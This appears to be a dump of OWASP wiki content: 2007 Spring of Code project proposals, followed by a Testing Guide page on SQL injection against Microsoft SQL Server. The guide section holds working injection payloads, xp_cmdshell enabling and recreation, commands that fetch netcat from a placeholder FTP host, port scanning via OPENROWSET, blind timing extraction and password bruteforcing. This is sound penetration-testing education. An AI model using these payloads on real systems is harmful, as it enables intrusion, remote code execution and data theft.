Note: This is no trivial task to get right. I would need to ensure I can commit to completing the work to a good quality. I think this will take at least 2 months from start to finish to complete but I think is very important for the industry and for potentially for OWASP. I wanted to gauge the interest by first posting this.

== Erwin Geirnaert - OWASP Java Project ==

* '''Executive Summary''':
I would like to help the OWASP Java Project to gather all Java security related information and to document any domains that lack documentation.

* '''Objectives and Deliverables''':
The main objective I see is to gather all information in one place, where security experts and developers can find the information they need.
In order to get there, I need to collect all information in the OWASP Wiki, ask people if they want to donate it to OWASP so that we can include it as public material, add URLs, white-papers, references to books, ... And if time permits, write some documentation myself.

One deliverable is the OWASP Top 10 for J2EE applications with clear examples of vulnerabilities and mitigations.

* '''Why you should be sponsored for the project''':
I have more then 10 years experience in Java and J2EE and the last 6 years I have tested and broke a lot of web applications. I gave also some very successful J2EE security courses and web security courses. I spoke at different conferences about application security in Europe.
And I am responsible for the security track at Javapolis, one of the biggest Jave conferences in Europe.
I am the co-founder of ZION SECURITY where we do security testing, code review, design reviews, training,...
I'm also member of the OWASP Belgium board that started in March 2007.

== Erwin Geirnaert - OWASP WebGoat Solutions Guide ==

* '''Executive Summary''':
WebGoat is used by a lot of people to learn about web application security and the different vulnerabilities. But it takes a lot of time to grasp how the tools like WebScarab work and how to use them effectively in WebGoat. I propose to create a walkthrough of the lessons in WebGoat so that people can learn from the solutions, without spoiling the fun.

* '''Objectives and Deliverables''':
The WebGoat Solutions Guide is a document that can be bundled with WebGoat. Each lesson contains a detailed solution with screenshots and tools. I created a PDF with the solution for WebGoat 4.0 but this is too big to load (15 MB) and is not very practical.

After a discussion with Bruce about this, we think that the solutions should be made like the existing Lessons Plan so it is easier to maintain and update when a lesson changes. This means that there will be documentation folder and an individual solution for each lesson.

* '''Why you should be sponsored for the project''':
I have more then 10 years experience in Java and J2EE and the last 6 years I have tested and broke a lot of web applications. I gave also some very successful J2EE security courses and web security courses. I spoke at different conferences about application security in Europe.
And I am responsible for the security track at Javapolis, one of the biggest Jave conferences in Europe.
I am the co-founder of ZION SECURITY where we do security testing, code review, design reviews, training,...
I'm also member of the OWASP Belgium board that started in March 2007.

== Bunyamin Demir – OWASP WeBekci Project ==

==== Executive Summary: ====

Web application firewalls (WAF) are gaining importance among the information security technologies designed to protect web sites from attack. WAF solutions prevent attacks that network firewalls and intrusion detection systems can't and they require no modification of application source code. ModSecurity [http://www.modsecurity.org/] is an open source web application firewall that runs as an Apache module. It is an embeddable web application firewall and it provides protection from a range of attacks against web applications. It is an open source project available to everyone; it however does not come with an admin panel.

I decided to provide this essential tool with a control panel which I believe will ease and thus encourage its usage.

ModSecurity allows for HTTP traffic monitoring and real-time analysis with no changes to existing infrastructure. My main goal is to analyze attacks and generate rules to change the configuration of the ModSecurity accordingly.

ModSecurity has a feature called “flexible rule engine” as its heart of Attack Prevention capability . It uses ModSecurity’s “Rule Language,” (a programming language designed to work with HTTP transaction data). It is easy to use and flexible; yet the system administrators need to learn its own rules to create what is called “Certified ModSecurity Rules” to be implemented. My control panel will automate the major code-generation in Rule Language.

==== Objectives and Deliverables: ====

* '''Configuration''' : Will add all configuration parameter
* '''Rule Generator''': Will write all the Rules in Rule Language
* '''Logging''' : Auditlog and debuglog will be added.
* '''Multiple-DB''' : Will add PostgreSql and Sqlite support.

==== Why I should be sponsored for the project: ====

I am involved with OWASP Turkey [http://www.owasp.org/index.php/Turkey] and interested very much in WAF. Even though this is my first project for OWASP, I am very much interested in every aspect of ModSecurity. With SpoC007’s support I will finalize my work on OWASP WeBekci [http://www.owasp.org/index.php/Category:OWASP_WeBekci_Project].

== Eric Sheridan and Dr. Goran Trajkovski - The Scholastic Application Security Assessment Project ==

=== ABSTRACT ===

One of the major goals of the Open Web Application Security Project is to educate developers in the field of application software security. Understanding the risks and threats associated with web application software is pivotal in building a mature application security process. While OWASP has made a significant impact in the professional industry, more time and energy should be focused towards the academic community. It is an unfortunate fact that most universities do not require a stringent software security course for their computer science students. Consequently, most young developers do not have the ability to assess and mitigate the risks and threats for their own applications. It is for this reason that we believe the Open Web Application Security Project should fund an initiative to encourage the adaptation of application software security methodologies in the academic course curriculum.

The Scholastic Application Security Project is intended to be the first step towards integrating security requirements in academic course curriculums. The primary goal of the project is to give students hands-on experience performing application security assessments using the tools and documentation found at http:///www.owasp.org. The assessment, lead by an application security professional, will demonstrate to students how the information and tools found at OWASP can be used to assess and ultimately increase the overall security posture of a web application.

This project contributes towards bridging the gap between academia and industry, by equipping students with hands-on ready-for-the-job-market skills in the application software securing industry.

=== PARTICIPANTS ===

The Scholastic Application Security Assessment Project requires that college level students, lead by an application security professional, perform a security audit on an open source web application using the tools and information available at OWASP.

::*'''Application Security Professional''' – Eric Sheridan ([http://www.aspectsecurity.com Aspect Security])
::*'''Towson University (TU) Partner''' – Dr. Goran Trajkovski, Towson University (http://www.towson.edu)
::*'''Students''' – Students of TU’s Application Software Security Course (COSC 458), nominated by the TU Partner
::*'''Web Application''' – The Open WebMail Project (http://openwebmail.org/)

=== OWASP UTILIZATION ===

The Scholastic Application Security Assessment Project requires heavy utilization of existing OWASP tools and utilities. Through this requirement, the project will illustrate the fact that existing OWASP resources can be used and heavily relied upon in a professional security audit. The following is a list of notable OWASP resources whose use will be documented throughout the assessment:

::*'''OWASP Top Ten 2007''' - The security critical areas that the students will assess in the review
::*'''OWASP Testing Guide v2''' – The primary resource for building penetration testing cases
::*'''OWASP Guide''' – The primary resource for technical details pertaining to a technology and/or vulnerability
::*'''OWASP WebScarabNG''' – The primary proxy utility used throughout the assessment

=== THE FINAL REPORT ===

Students are required to follow the principle of “responsible disclosure” during the course of the security assessment. The developers of the open source application will be notified if any significant issues are found. Once the assessment is complete, a final report will be delivered to the application developers and the appropriate OWASP Spring of Code personnel. For each finding in the report, the students will be required to describe how the tools and information found at OWASP were used in the discovery.

=== HOW DOES OWASP BENEFIT? ===

The Scholastic Application Security Assessment Project is specifically designed to benefit the OWASP brand:

''The OWASP Community…''
::*will be provided a case study proving that the resources available at OWASP can be utilized in an academic environment, that can be later used in advertising the OWASP efforts to similar programs as the one at TU.
::*will be providing students a hands on experience in learning and testing for the latest web application security threats, thus potentially enlarging the OWASP community of contributors and supporters.
::*will be addressing the need to educate developers in the security critical areas.
::*will be seen as offering a professional level service to another open source project.
::*will be addressing one of the root causes of application software insecurity.

=== BACKGROUND ===

'''Eric Sheridan:'''

::*Earned a Bachelor’s of Science in Computer Science from Towson University
::*Graduate Student in Information Security at Johns Hopkins University
::*Application Security Engineer at Aspect Security
::*Lead of the OWASP Stinger Project and the OWASP Validation Project

'''Goran Trajkovski, PhD:'''

::*Has been teaching the Application Software Security course for the Computer Security undergraduate and master-level majors at TU since 2004 (TU has been a Center of Excellence in Information Assurance, designated by the NSA since 2002).
::*Assistant professor of Computer and Information Sciences at Towson University, and Director of its Cognitive Agency and Robotics Lab (CARoL).
::*Has lead curricular efforts in integrating application software security topics throughout the Computer Science and Computer Information Sciences curriculum
::*12 years of full time teaching experience in higher ed.

==Boris - OWASP Site Generator==
OWASP Site Generator is a great tool, but it could be even better and more widespread. There’s a lot room for improvements to both its functionality and user experience. The way I see it, main user needs to be addressed and specific development objectives for the next release of OWASP Site Generator would be:
===User Needs===
*Create multiple types of sites easily
*Track and analyze requests easily
*Change the look and feel of the resulting sites easily
*Create sites for multiple web backend technologies easily
*Learn how to use OWASP Site Generator easily

===Development Objectives===
*Create a vulnerability library that can be used for web services, HTML forms, AJAX, etc. instead of having to craft the same attack for each
*Add support for logging of all received requests, as well as querying resulting log files
*"Templatize" the code generation process, so it can support skinning of the resulting sites
*"Templatize" the code generation process, so it can support different backend web technologies
*Fix all significant defects in the current release of OWASP Site Generator
*Redesign the GUI to make it more efficient and user friendly
*Create a smooth setup program which would install both client and server components as effortlessly as possible
*Write documentation and articles about it
*Make the development process open to the public and, hopefully, driven by its feedback from day one

===Why should I be sponsored for this project===
Well, probably because of my past work on AoC (I just hope that won’t be the reason for me ''not'' to be sponsored :)

==Boris - OWASP Report Generator==
There is no doubt that OWASP Report Generator is a very handy tool for penetration testers and other security researchers, but it would be even better if some enhancements were made:
===User Needs===
*More robustness
*Ease of use (more efficient and intuitive GUI)
*Automated reporting for some typical (or not so typical) scenarios
*More documentation
*More samples

===Development Objectives===
*Redesign the GUI to make it more efficient and user friendly
*Clean up the code
*Add functionality to import, execute and create reports for OWASP Tiger automated tests
*Create some samples
*Create a smooth setup program
*Write documentation and articles about it
*Make the development process open to the public and, hopefully, driven by its feedback from day one
===Why should I be sponsored for this project===
Well, probably because of my past work on AoC (I just hope that won’t be the reason for me ''not'' to be sponsored :)

==Boris - OWASP Tiger==
OWASP Tiger project is at its very beginning. Some new features are needed in order for it to become more useful. Here’s a short list:
===User Needs===
*Easier editing of test projects
*Support for testing sites that require authentication
*Support for testing sites that require use of cookies
*An easy way of specifying vulnerability data, ideally an automated one
*More flexible reporting
*More project templates
*More documentation
===Development Objectives===
*Add support for cookies
*Add support for standard authentication schemes
*Add support for importing vulnerability data from a test definition (or a vulnerability library)
*Make use of OWASP Report Generator for more advanced reports
*Create a setup program that would install both client and project templates and also allow for adding new templates after the initial installation
*Write documentation and articles about it
*Make the development process open to the public and, hopefully, driven by its feedback from day one
===Why should I be sponsored for this project===
Well, probably because of my past work on AoC (I just hope that won’t be the reason for me ''not'' to be sponsored :)

==Heiko - Web Application Security put into practice==
I'm trying to make the OWASP Top Ten and Guide project known in the programming community, but I understand that clear examples in the specific programming language and best practices with explanation educate the best. I'm at the chair for secure software at my university and I want to contribute practical examples, because I believe not to teach secure programming is a great oversight in today's education. Not only the programmers in large companies have to be aware of security impacts, but also their future employees and their freelance programmers. I'm with a large organization of freelance programmers, which I want to make aware of security flaws.

The Ruby on Rails Security project [http://www.rorsecurity.info/] started this year and is the only security initiative for Ruby on Rails. Ruby is the fastest growing level A programming language, according to the Tiobe programming community index [http://www.tiobe.com/tpci.htm], partly because of its advertised simplicity. This is dangerous, as programmers could be enticed to do cargo cult programming [http://en.wikipedia.org/wiki/Cargo_cult_programming] without knowing the security impacts. I found several security holes in popular modules, and even the Rails framework itself generates potentially insecure code. Nevertheless, Rails provides good means against many of the OWASP Top Ten security flaws, but I believe these means have to be popularized much more.

===Objectives and Deliverables===
* Create a security guide to the most popular web server software, Apache
** Installation
** secure configuration, emphasis on Rails, but not limited to it
** file system privileges for Rails and Apache
** anti profiling techniques for Apache
** Modules and Mod_security configuration

* Create a security guide to the popular database software, MySQL, as practical contribution to the OWASP Top 10 Insecure storage section
** Installation
** secure configuration, emphasis on Rails, but not limited to it
** file system privileges for Rails and MySQL
** MySQL access restriction techniques
** encryption methods

* Ruby on Rails security guide and code examples, with at least the following topics:
** Anti profiling techniques
** Rails routes security
** error handling and presentation, as in OWASP Top 10 Improper Error Handling
** OWASP Top 10: XSS in Rails
** OWASP Top 10: SQL injection in Rails
** OWASP Top 10: Parameter injection in Rails
** OWASP Top 10: Session handling in Rails
** OWASP Top 10: Access control in Rails
** handling of files
** integrity
** encryption and SSL
** logging flaws
** Ajax security

* Code & other
** means to check the security of MySQL
** input validation guide, and implement it in Ruby
** update the poorly documented guide at http://manuals.rubyonrails.com/read/chapter/40 which is the only official guide to security
** usage guide for OWASP tools, also in connection with Rails
** make the results known in the several communities I'm in
** if applicable: submit code to Rails for security holes found

===Why I should be sponsored for the project===
I have been programming professionally for 10 years and created several software products, including Internet applications, and I always focused on security. I am currently graduating university, my thesis is about web application security. Recently, I started the Ruby on Rails security project, which is the only security project for Rails. I have always delivered my work on time, and I believe I have the knowledge to deliver good quality.

===Long-term vision for the project===
Make it available to the community and accept security notices and best practices from other users to constantly improve it.

===Benefits to the OWASP===
* practical guides on how to put security into practice: the most popular web server software Apache and the popular database software MySQL
* if applicable: additional examples and chapters for the OWASP Guide
* the first and only fully-fledged security guide to a programming language and framework which is used by many large companies
* security awareness of future employees and freelancers
* more exposure of the OWASP

==Denis – Python Tainted Mode==
I am graduate student of Moscow State University, department of Computational Mathematics and Cybernetics.
My graduate work is dedicated to web-application security. The goal of my graduate work is to combine dynamic code analysis with penetration testing to provide more precise analysis.
This work will help to find security vulnerabilities in web-applications.
I successfully presented parts of my work at university conferences.

===My Project===
The goal of my project is to create analog of Perl’s Taint Mode for Python programming language.
Taint mode is successfully used in Perl, PHP, and Ruby to find input validation vulnerabilities in web-applications (see for ex. PHPRevent[http://dependability.cs.virginia.edu/info/PHPrevent]).
Unfortunately there is no implementation of Taint Mode for Python language despite of wide spread of Python-based web-applications. Taint Mode for Python is highly claimed.
I plan to modify Python interpreter and add Taint label propagation. Then I’ll add three configuration lists:
* List of sources. All data emanating from sources must be marked tainted.
* List of critical functions, that shouldn’t receive tainted data.
* List of sanitizing functions that untaints data.
These three lists are dependent on technology that is used between web-server and web-applications in web server. In my project I plan to build such lists for mod_python and then broaden for other technologies. With switched on taint mode web-application will receive exceptions when critical function receives tainted data.

===Why should I be selected===
I have strong mathematical & computer science background. I’m familiar with research publications on dynamic analysis and with implementation of taint mode in Perl and PHP (PHPrevent Project).
This project is part of my work at university. It will be made under mentoring of my scientific advisor.
This work is already practically done that’s why I’m sure I will finish my project in time.
I have strong skills in developing projects with Python, Java, C, C++, and Assembler. Then I plan to support, develop and enhance my project and increase its quality with penetration testing.

If you have any questions or would like further information, feel free to contact me.

Yours faithfully,
Denis

== Darren Edmonds - WebScarab NG Security Test Automation ==

=== Background ===
I am a 28 year old software developer from the UK with a background in java based web development and application security testing. I have strong mathematical skills, a degree in software engineering, a SCJP qualification and 8 years of commercial development experience. I have created many web based and standalone applications delivering on time and adhering to common software practices.
I'm an avid supporter of open source software and try to use it whenever possible in a commercial environment. I've made contributions to the Geotools mapping project, written a securing tomcat article for OWASP and developed a full modification for the first person shooter Quake 3.

=== Project Details ===
Having used numerous penetration testing applications I believe there is a need for an open source application which supports some, or all, of the features of the more expensive commercial products. I propose to make WebScarab generate, record, and playback security test cases so that regression testing is possible. If time permits I would also like to include some extra automated tests that are not always feasible during manual testing; searching for backup files (~, Copy of X), checking non-authorised access to authorised areas, common and brute force name directory searching, etc. Perhaps include the ability to read the test database of other scanning tools such as nikto.
I have already made contact with Rogan Dawes, original WebScarab NG author, to discuss some initial ideas. I believe it is important that Rogan is consulted during the initial planning phase to make sure the project keeps to a set of consistent guidelines.

=== Milestones ===
* Research regression testing features in other applications
* Create a functional specification
* Build testing framework (possible inclusion of scripting language for user defined tests)
* Testing

=== Why I Should be Sponsored ===
I believe I am an ideal candidate to develop the proposed additions to WebScarab NG, not just because of my qualifications and experience, but because I plan to use WebScarab NG in my work to help perform the initial testing of web applications. As well as my own time my current employer will allocate me a set amount of time to ensure the project achieves its milestones.
The end result will make WebScarab NG a much more powerful testing tool and will be a great asset to the OWASP community. With continued development and input from the community I see no reason why WebScarab NG cannot rival commercial testing application features, usability, and business benefit. Increasing WebScarab's features will result in increased community awareness bringing in extra developers, ensuring continual development and so the cycle starts again.

== Bernardo - sqlmap ==

* '''Executive Summary'''
[http://sqlmap.sourceforge.net sqlmap] is an automatic blind SQL injection tool, developed in python, capable to perform an active database fingerprint, to enumerate entire remote database and much more. The aim of this project is to implement a fully functional database mapper tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.

* '''Objectives and Deliverables'''
** Add support for Oracle database;
** Add support to extract database users password hash and implement an automatic password bruteforcer;
** Extend inband SQL injection (--union-use command line parameter) functionality to all other possible queries;
** Add Microsoft SQL Server database fingerprint;
** Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting;
** Add support for SQL injection on HTTP 'Cookie' and 'User-Agent' headers;
** Add support for query ETA (Estimated Time of Arrival) real time calculation;
** Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions;
** Improve logging functionality.

* '''Long-term vision for the project'''
Make sqlmap available as an easy-to-use enumeration and penetration testing tool to the OWASP community extending its functionality to exploit SQL injection vulnerabilities to provide a remote shell on the affected web application database server when possible.
In the long run I would also like to develop a graphical user interface.

* '''Why I should be sponsored for the project'''
I have good python programming skills and some years of experience in computer networks security. I spent most of the last year researching on web application insecurity taking over the [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap development] since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

Testing for SQL Server

2007-01-17T14:28:58Z

Inquis:

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
 
In this paragraph we describe some [http://www.owasp.org/index.php/SQL_Injection_AoC SQL Injection] techniques that utilize specific features of Microsoft SQL Server.
 

== Short Description of the Issue ==
SQL injection vulnerabilities occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers and execute of SQL code under the privileges of the user used to connect to the database.

As explained in [[SQL injection]] a SQL-injection exploit requires two things: an entry point and an exploit to enter. Any user-controlled parameter that gets processed by the application might be hiding a vulnerability. This includes:

* Application parameters in query strings (e.g., GET requests)
* Application parameters included as part of the body of a POST request
* Browser-related information (e.g., user-agent, referer)
* Host-related information (e.g., host name, IP)
* Session-related information (e.g., user ID, cookies)

Microsoft SQL server has a few particularities so that some exploits need to be specially customized for this application that the penetration tester has to know in order to exploit them along the tests.

== Black Box testing and example ==

===SQL Server Peculiarities===

To begin, let's see some SQL Server operators and commands/stored procedures that are useful in a SQL Injection test:

* comment operator: -- (useful for forcing the query to ignore the remaining portion of the original query, this won't be necessary in every case)
* query separator: ; (semicolon)
* Useful stored procedures include:
** [[http://msdn2.microsoft.com/en-us/library/ms175046.aspx xp_cmdshell]] executes any command shell in the server with the same permissions that it is currently running. By default, only '''sysadmin''' is allowed to use it and in SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure)
** '''xp_regread''' reads an arbitrary value from the Registry (undocumented extended procedure)
** '''xp_regwrite''' writes an arbitrary value into the Registry (undocumented extended procedure)
** [[http://msdn2.microsoft.com/en-us/library/ms180099.aspx sp_makewebtask]] Spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text. It requires '''sysadmin''' privileges.
** [[http://msdn2.microsoft.com/en-US/library/ms189505.aspx xp_sendmail]] Sends an e-mail message, which may include a query result set attachment, to the specified recipients. This extended stored procedure uses SQL Mail to send the message.
 
Let's see now some examples of specific SQL Server attacks that use the aformentioned functions. Most of these examples will use the '''exec''' function.

Below we show how to execute a shell command that writes the output of the command ''dir c:\inetpub'' in a browseable file, assuming that the web server and the DB server reside on the same host. The following syntax uses xp_cmdshell:
<pre>
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--
</pre>
Alternatively, we can use sp_makewebtask:
<pre>
exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--
</pre>
A successful execution will create a file that it can be browsed by the pen tester. Keep in mind that sp_makewebtask is deprecated and, even if it works to all SQL Server versions up to 2005, might be removed in the future.

Also SQL Server built-in functions and environment variables are very handy: The following uses the function '''db_name()''' to trigger an error that will return the name of the database:
<pre>
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name())
</pre>
Notice the use of [[http://msdn.microsoft.com/library/en-us/tsqlref/ts_ca-co_2f3o.asp convert]]:
<pre>
CONVERT ( data_type [ ( length ) ] , expression [ , style ] )
</pre>
CONVERT will try to convert the result of db_name (a string) into an integer variable, triggering an error that, if displayed by the vulnerable application, will contain the name of the DB.

The following example uses the environment variable '''@@version ''', combined with a "union select"-style injection, in order to find the version of the SQL Server.
<pre>/form.asp?prop=33%20union%20select%201,2006-01-06,2007-01-06,1,'stat','name1','name2',2006-01-06,1,@@version%20--
</pre>
And here's the same attack, but using again the conversion trick:
<pre>
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20@@VERSION)
</pre>
Information gathering is useful for exploiting software vulnerabilities at the SQL Server, through the exploitation of a SQL-injection attack or direct access to the SQL listener.

There follow several examples that exploit SQL injection vulnerabilities through different entry points.

===Example 1: Testing for SQL Injection in a GET request. ===

The most simple (and sometimes rewarding) case would be that of a login page requesting an user name and password for user login. You can try entering the following string "' or '1'='1" (without double quotes):

<nowiki>https://vulnerable.web.app/login.asp?Username='%20or%20'1'='1&Password='%20or%20'1'='1</nowiki>

If the application is using Dynamic SQL queries, and the string gets appended to the user credentials validation query, this may result in a successful login to the application.

===Example 2: Testing for SQL Injection in a GET request (2).===

In order to learn how many columns there exist

<nowiki>https://vulnerable.web.app/list_report.aspx?number=001%20UNION%20ALL%201,1,'a',1,1,1%20FROM%20users;--</nowiki>

===Example 3: Testing in a POST request ===

SQL Injection, HTTP POST Content: email=%27&whichSubmit=submit&submit.x=0&submit.y=0

A complete post example:

POST <nowiki>https://vulnerable.web.app/forgotpass.asp HTTP/1.1</nowiki>
Host: vulnerable.web.app
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Paros/3.2.13
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: <nowiki>http://vulnerable.web.app/forgotpass.asp</nowiki>
Content-Type: application/x-www-form-urlencoded
Content-Length: 50 
email=%27&whichSubmit=submit&submit.x=0&submit.y=0

The error message obtained when a ' (single quote) character is entered at the email field is:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '' '.
/forgotpass.asp, line 15

===Example 4: Yet another (useful) GET example===

Obtaining the application's source code

a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--

===Example 5: custom xp_cmdshell===

All books and papers describing the security best practices for SQL Server recommend to disable xp_cmdshell in SQL Server 2000 (in SQL Server 2005 it is disabled by default). However, if we have sysadmin rights (natively or by bruteforcing the sysadmin password, see below), we can often bypass this limitation.
 
On SQL Server 2000:
* If xp_cmdshell has been disabled with sp_dropextendedproc, we can simply inject the following code:
<pre>
sp_addextendedproc 'xp_cmdshell','xp_log70.dll'
</pre>
* If the previous code does not work, it means that the xp_log70.dll has been moved or deleted. In this case we need to inject the following code:
<pre>
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
</pre>
This code, written by Antonin Foller (see links at the bottom of the page), creates a new xp_cmdshell using sp_oacreate, sp_method and sp_destroy (as long as they haven't been disabled too, of course). Before using it, we need to delete the first xp_cmdshell we created (even if it was not working), otherwise the two declarations will collide.
 
On SQL Server 2005, xp_cmdshell can be enabled injecting the following code instead:
<pre>
master..sp_configure 'show advanced options',1
reconfigure
master..sp_configure 'xp_cmdshell',1
reconfigure
</pre>

===Example 6: Referer / User-Agent===

The REFERER header set to:

Referer: <nowiki>https://vulnerable.web.app/login.aspx', 'user_agent', 'some_ip'); [SQL CODE]--</nowiki>

Allows the execution of arbitrary SQL Code. The same happens with the User-Agent header set to:

User-Agent: user_agent', 'some_ip'); [SQL CODE]--

===Example 7: SQL Server as a port scanner===

In SQL Server, one of the most useful (at least for the penetration tester) commands is OPENROWSET, which is used to run a query on another DB Server and retrieve the results. The penetration tester can use this command to scan ports of other machines in the target network, injecting the following query:
<pre>
select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=foobar;Network=DBMSSOCN;Address=x.y.w.z,p;timeout=5','select 1')--
</pre>
This query will attempt a connection to the address x.y.w.z on port p. If the port is closed, the following message will be returned:
<pre>
SQL Server does not exist or access denied
</pre>
On the other hand, if the port is open, one of the following errors will be returned:
<pre>
General network error. Check your network documentation
</pre>
<pre>
OLE DB provider 'sqloledb' reported an error. The provider did not give any information about the error.
</pre>
Of course, the error message is not always available. If that is the case, we can use the response time to understand what is going on: with a closed port, the timeout (5 seconds in this example) will be consumed, whereas an open port will return the result right away.

Keep in mind that OPENROWSET is enabled by default in SQL Server 2000 but disabled in SQL Server 2005.

===Example 8: Upload of executables===

Once we can use xp_cmdshell (either the native one or a custom one), we can easily upload executables on the target DB Server. A very common choice is netcat.exe, but any trojan will be useful here.
If the target is allowed to start FTP connections to the tester's machine, all that is needed is to inject the following queries:
<pre>
exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
exec master..xp_cmdshell 'echo USER >> ftpscript.txt';--
exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--
</pre>
At this point, nc.exe will be uploaded and available.
 
If FTP is not allowed by the firewall, we have a workaround that exploits the Windows debugger, debug.exe, that is installed by default in all Windows machines. Debug.exe is scriptable and is able to create an executable by executing an appropriate script file. What we need to do is to convert the executable into a debug script (which is a 100% ascii file), upload it line by line and finally call debug.exe on it. There are several tools that create such debug files (e.g.: makescr.exe by Ollie Whitehouse and dbgtool.exe by toolcrypt.org). The queries to inject will therefore be the following:
<pre>
exec master..xp_cmdshell 'echo [debug script line #1 of n] > debugscript.txt';--
exec master..xp_cmdshell 'echo [debug script line #2 of n] >> debugscript.txt';--
....
exec master..xp_cmdshell 'echo [debug script line #n of n] >> debugscript.txt';--
exec master..xp_cmdshell 'debug.exe < debugscript.txt';--
</pre>
At this point, our executable is available on the target machine, ready to be executed.

There are tools that automate this process, most notably Bobcat, which runs on Windows, and Sqlninja, which runs on *nix (See the tools at the bottom of this page).

===Obtain information when it is not displayed (Out of band)===

Not all is lost when the web application does not return any information --such as descriptive error messages (cf. [[http://www.owasp.org/index.php/Blind_SQL_Injection|Blind SQL injection]]). For example, it might happen that one has access to the source code (e.g., because the web application is based on an open source software). Then, the pen tester can exploit all the SQL-injection vulnerabilities discovered offline in the web application. Although an IPS might stop some of these attacks, the best way would be to proceed as follows: develop and test the attacks in a testbed created for that purpose, and then execute these attacks against the web application being tested.

Other options for out of band attacks are describe in Sample 4 above.

===Blind SQL injection attacks===

====Trial and error====
Alternatively, one may play lucky. That is the attacker may assume that there is a blind or out-of-band SQL-injection vulnerability in a the web application. He will then select an attack vector (e.g., a web entry), use fuzz vectors ([[http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors]]) against this channel and watch the response. For example, if the web application is looking for a book using a query

select * from books where title='''text entered by the user'''

then the penetration tester might enter the text: ''''Bomba' OR 1=1-''' and if data is not properly validated, the query will go through and return the whole list of books. This is evidence that there is a SQL-injection vulnerability. The penetration tester might later ''play'' with the queries in order to assess the criticality of this vulnerability.

====In case more than one error message is displayed====
On the other hand, if no prior information is available there is still a possibility of attacking by exploiting any ''covert channel''. It might happen that descriptive error messages are stopped, yet the error messages give some information. For example:

* On some cases the web application (actually the web server) might return the traditional ''500: Internal Server Error'', say when the application returns an exception that might be generated for instance by a query with unclosed quotes.
* While on other cases the server will return a 200OK message, but the web application will return some error message inserted by the developers ''Internal server error'' or ''bad data''.

This 1 bit of information might be enough to understand how the dynamic SQL query is constructed by the web application and tune up an exploit.

Another out-of-band method is to output the results through HTTP browseable

====Timing attacks====
There is one more possibility for making a blind SQL-injection attack, for example, using the time that it takes the web application to answer a request (see, e.g., ''Bleichenbacher's attack''). An attack of this sort is described by Anley in ([2]) from where we take the next example. A first approach uses the ''SQL command waitfor delay '0:0:5','' for example assume that data is not properly validated through a given attack vector but there is no feedback. Let's say that the attacker wants to check if the ''books'' database exists he will send the command

if exists (select * from pubs..pub_info) waitfor delay '0:0:5'

In fact, what we have here is two things: a '''SQL-injection vulnerability''' and a '''covert channel''' that allows the penetration tester to get 1 bit of information. Hence, using several queries (as much queries as the bits in the required information) the pen tester can get any data that is in the database. Say, the string

declare @s varchar(8000)
select @s = db_name()
if (ascii(substring(@s, ''n'', ''b'')) & ( power(2, 0))) > 0 waitfor delay 0:0:5

will wait for 5 seconds if the ''n''th bit of the name of the current database is ''b'', and will return at once if it is ''1-b''. After discovering the value of each byte, the pen tester will see if the first bit of the next byte is neither 1 nor 0, this means that the string has ended!

However, it might happen that the command ''waitfor'' is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL-injection attacks cannot be done, the pen tester should only come up with any time consuming operation that is not filtered. For example

declare @i int select @i = 0
while @i < 0xaffff begin
select @i = @i + 1
end

===Example 8: bruteforce of sysadmin password===

We can leverage the fact that OPENROWSET needs proper credentials to successfully perform the connection and that such a connection can be also "looped" to the local DB Server.
Combining these features with an inferenced injection based on response timing, we can inject the following code:
<pre>
select * from OPENROWSET('SQLOLEDB','';'sa';'<pwd>','select 1;waitfor delay ''0:0:5'' ')
</pre>
